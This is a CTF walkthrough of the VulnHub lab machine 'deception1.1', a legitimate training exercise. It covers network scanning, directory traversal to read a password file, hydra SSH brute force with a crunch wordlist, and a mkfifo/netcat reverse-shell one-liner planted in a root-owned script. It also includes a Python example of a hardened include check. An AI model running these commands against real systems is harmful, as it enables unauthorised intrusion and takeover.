Here is another writeup of mine, on an amazing CTF-type box. I picked up a very new thought process while doing this…

DESCRIPTION:
- Name: haclabs: deception1.1
- Date release: 19 Mar 2020
- Author: HacLabs
- Series: haclabs
- Web page: https://www.haclabs.org/VulnerableLabs/Deception-1.1
This machine is the next part of Deception machine. This time try harder to get root!
To complete this challenge you need to find 3 flags.
flag 2 : Password to unzip the zip file.
flag 1 : Present in /home/yash/
flag 0 : Present in /root/
This is a beginner/intermediate level machine.
Technical Information :
machine is based on Ubuntu 64bit
Tested on virtualBox
DHCP is enabled (set as bridged networking)
NOTE : you may face connection lost issue , no problem restart the virtual machine and everything will start to work again!
I found “646563657074696f6e312e31” this while creating the machine .
Contact
If you have solved this machine in an unintended way then please let us know, you may get a chance to publish your writeup on our website.
Works best in VirtualBox rather than VMware. Note: This is MEANT to be password protected
DOWNLOAD LINK: https://download.vulnhub.com/haclabs/haclabs_deception1.1.zip
So let's start by finding the IP address of the machine with the very first command we always use, netdiscover:
netdiscover -i vboxnet0

- -i device: your network device
- to find the name of the network device, use the command ifconfig

Now let's start with an nmap scan:
nmap -v -sCV -A -O -p- 192.168.56.102
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 75:b3:93:d4:f1:02:30:bf:35:ea:12:4e:3b:e7:fa:4a (RSA)
| 256 f9:8c:43:5b:45:7d:fe:84:b1:f5:93:a3:68:bb:ce:84 (ECDSA)
|_ 256 77:2a:33:3e:8f:2b:65:a5:f3:df:b5:bc:58:4a:f4:8e (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn’t have a title (text/html).
Let's enumerate:
@PORT 22:
Let's try logging in as root and check whether there is any flag.

So there is no flag or hint on port 22.
Let's move to port 80.
@PORT 80:
Got a login panel on the home page.

Tried some default credentials, admin:admin.

We get a strong-password guide.
Let's try a password of that type: Abcd123@
It gives a popup that looks like the name of a PHP file, “0000flagflagflagflag.php”.

Clicking OK takes us to another page,

where the value of flag is defined as 1:
flag=1
Maybe it applies to the given PHP file name; replacing each “flag” with 1 gives:
“0000flagflagflagflag.php” = “00001111.php”
Let's browse to “00001111.php”.

There is another popup, which says to find password.txt.
Let's check the source code.

At the end of the source code it says to use ?page=
Let's try that.
Tried 00001111.php?page=password.txt, but it didn't work, so tried ../password.txt and then ../../password.txt, and finally it worked.

yash : ya5h**
Here we get a username and the first four characters of a six-character password, so we have to find the last two characters.
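The ?page= behaviour seen above, modelled as an added example (not code from the box, whose PHP source the writeup does not show): a naive include beside a hardened one that resolves the path and rejects anything outside the pages directory. The directory layout, file contents and function names are constructed assumptions, and the symlink case goes slightly beyond what the writeup tests.

```python
import os
import tempfile

# The three values tried in the writeup, plus a normal page and a symlink.
PAGES = ["password.txt", "../password.txt", "../../password.txt",
         "home.txt", "leak.txt"]

def build_demo_site():
    """Constructed layout: <root>/password.txt, <root>/html/pages/home.txt,
    and pages/leak.txt as a symlink pointing out to password.txt."""
    root = os.path.realpath(tempfile.mkdtemp(prefix="lfi_demo_"))
    pages = os.path.join(root, "html", "pages")
    os.makedirs(pages)
    with open(os.path.join(root, "password.txt"), "w") as fh:
        fh.write("constructed-secret\n")
    with open(os.path.join(pages, "home.txt"), "w") as fh:
        fh.write("welcome\n")
    os.symlink(os.path.join(root, "password.txt"), os.path.join(pages, "leak.txt"))
    return pages

def naive_include(base, page):
    """Weak form: the parameter is joined to the base path unchecked."""
    with open(os.path.join(base, page)) as fh:
        return fh.read()

def safe_include(base, page):
    """Hardened form: resolve '..' and symlinks, then require containment."""
    base = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base, page))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError("page resolves outside " + base)
    with open(target) as fh:
        return fh.read()

def probe(include, base):
    """Return read / missing / blocked for each page value."""
    results = {}
    for page in PAGES:
        try:
            include(base, page)
            results[page] = "read"
        except FileNotFoundError:
            results[page] = "missing"
        except PermissionError:
            results[page] = "blocked"
    return results

if __name__ == "__main__":
    for fn in (naive_include, safe_include):
        print(fn.__name__, probe(fn, build_demo_site()))
```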
Let's create a wordlist of all the combinations with crunch:
crunch 6 6 -t ya5h@@ -o yash_wordlist

Let's brute-force the password with hydra:
hydra -l yash -P 'yash_wordlist' 192.168.56.102 ssh

We got the password, yash : ya5hay. Let's log in:
ssh yash@192.168.56.102

I think it is the flag1.txt.
Privilege Escalation:

Found a .sh file owned by root, with read and write permission.
Let's use the perm.sh file to get a reverse connection to our main PC:
echo '#!/bin/bash' > perm.sh
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.1 4455 >/tmp/f' >> perm.sh

Start a listener and wait:
nc -lvp 4455

Got ROOT

DONE.
Please give your precious feedback on Twitter: @c0rrupt3d_brain.